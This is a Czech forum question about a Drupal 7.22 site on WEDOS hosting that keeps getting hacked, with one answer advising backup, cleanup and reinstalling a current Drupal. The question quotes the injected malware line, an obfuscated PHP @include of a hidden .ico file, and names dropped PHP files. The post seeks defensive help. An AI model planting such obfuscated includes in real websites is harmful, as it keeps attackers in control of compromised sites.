Zabezpečení Drupal verze 7.22 na webhostingu WEDOS
Dobrý den,
na webhostingu WEDOS provozujeme web na redakčním systému Drupal verze 7.22.
Web je ustavičně napadán tak, že je přepsán soubor index.php v rootu webu i když má nastaveno atribut 444 (jen čtení).
V přepsaném souboru je vložen kód, např.:
/*d5263*/
@include „\057data\057web/\166irtu\141ls/1\0613731\057virt\165al/w\167w/th\145mes/\147arla\156d/co\154or/.\1446cb4\071b0.i\143o“;
/*d5263*/
Atribut souboru je změněn na 755.
Dále bývají v rootu různé soubory php, např.: tl8s7e12.php
a také jsou do dalších adresářů v FTP webu nahrané další soubory index.php, nebo jiné soubory php.
Dá se s tím něco na webhostingu WEDOS dělat?
Nemám s Drupalem příliš zkušeností, zdědil jsem tento web po jiné firmě, která ho realizovala v roce 2015.
2 Answers
Dobrý den,
to jsou typické znaky napadeného webu. Doporučuji vše zálohovat, exportovat uživatelská data, pokud možno je zkontrolovat a případně vyčistit od škodlivého softwaru, nahrát nový čistý drupal v aktuální verzi a importovat do něho uživatelská data. Nebo obnovit celý web z poslední funkční zálohy.